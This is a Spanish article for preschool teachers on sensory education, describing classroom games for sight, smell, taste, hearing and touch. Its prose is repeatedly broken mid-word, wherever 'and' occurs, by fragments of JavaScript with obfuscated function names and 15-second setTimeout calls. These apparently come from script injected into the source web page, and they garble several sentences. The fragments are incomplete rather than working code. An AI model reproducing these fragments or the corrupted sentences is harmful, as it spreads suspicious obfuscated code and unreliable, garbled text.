LA EDUCACIÓN SENSORIAL EN LOS NIÑOS DE EDUCACIÓN INFANTIL

Autora: Manuela González Castaño

         En los primeros años de vida, los sentidos son el medio que permite a los niños y niñas conocer el mundo que les rodea.

         A medida que van desarrollandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sus sentidos, van progresandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en el conocimiento y la construcción de un mundo físico y social cada vez más completo. De ahí, la importancia de trabajar en el aula de educación infantil la estimulación y desarrollo sensorial.

         A continuación, nombramos diferentes actividades para realizar en el aula de educación infantil, que contribuirán al desarrollo de los sentidos:

-         LA VISTA.- es un sentido que no está totalmente definido al nacer, pero pronto se producirá la acomodación del cristalino y los niños y niñas tendrán un desarrollo de la vista completo. Para desarrollar el sentido de la vista, podemos proponer diferentes actividades. Entre ellas destacamos:

  • Pasitos ciegos: consiste en vendar los ojos al niño para que así perciba la diferencia entre el color y la ausencia de éste. También podremos darle instrucciones para que vaya dirigiéndose a algunos lugares con los ojos vendados. El niño comprobará que los sentidos actúan relacionados entre sí, esto le producirá un aumento de su confianza y autoestima.
  • Otras actividades que despierta la atención de los pequeños es enseñarles el arcoiris o sus colores. Para ello podemos coger una manguera y gracias a los rayos del sol, los niños y niñas podrán ver cómo el agua se convierte en diferentes colores.

 

-         EL OLFATO.- dicen que el olfato es uno de los sentidos que más recuerdos despierta y que, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hueles algo, es la manera de retroceder en el tiempo. Una propuesta para realizar con los niños y niñas de educación infantil es:

  • Buscandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando mi perfume: separamos a la clase en dos grupo iguales. Uno de ellos serán las flores y otros las mariposas. El educador/a  echará a las flores un perfume diferente y se situarán en diferentes lugares de la clase, separadas. El educador /a, después,  tendrá que dar a oler a las mariposas un olor que tendrán que buscar en una de las flores.

 

-         EL GUSTO.- desde pequeñitos, los niños y niñas tienen la capacidad de distinguir los diferentes tipos de sabores. Una actividad que podemos realizar es:

  • Pruébame: colocaremos en la clase una mesita, “la mesa de los manjares”, con diferentes cuencos. Cada uno de ellos tendrá un tipo de alimento, algo salado, algo dulce, algo amargo, ácido…no importa que los pequeños vean antes de qué alimentos se trata. Después vendaremos a los niños y niñas los ojos y tendrán que adivinar el alimento que han probado.

 

-         EL OÍDO.- es un sentido ya desarrollado al nacer, incluso hay constancia de que los bebés oyen en la vida intrauterina. Para la estimulación de este sentido, proponemos:

  • ¿Dónde está?: es un juego para el que necesitamos un despertador o un móvil. Le pediremos a un niño que abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andone la clase un momento, mientras que los demás escondemos ese despertador o el móvil, programado para que suene en unos minutos. El niño, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando entre, tendrá que esperar que suene el aparato y encontrarlo.
  • ¿Qué será?: en un CD tendremos grabados distintos sonidos (agua, motor de un coche, tambores, pájaros…). Pondremos a los niños y niñas estas audiciones y ellos tendrán que averiguar de qué se trata.
  • ¿Quién es?: vendaremos a un niño los ojos y le pediremos que escuche atentamente. Uno de sus compañeros de clase tendrá que decir: “Si adivinas quién soy, un aplauso te doy”. Y, el niño, por la voz, lo averigua, toda la clase le dará un aplauso.

 

-         EL TACTO.- los niños y niñas son muy sensibles a las caricias y al contacto físico. Para desarrollar el tacto, sugerimos las siguientes actividades:

  • El saquito: colocaremos varios saquitos de tela de colores, que no sean transparentes e introduciremos diferentes objetos: manzana, cepillo de dientes, esponja, telas…lo que tengamos a mano. Los niños tendrán que tocar el contenido del saquito y averiguar lo que se esconde dentro.
  • A un niño de la clase, le vendaremos los ojos y tendrá que reconocer a uno de sus compañeros por el tacto, es decir, tocándolo.

 

BIBLIOGRAFÍA:

  • -         Revista “Educación de 0 a 3 años”, nº1, noviembre, 2010, pág. 21
  • -         www.guiainfantil.com

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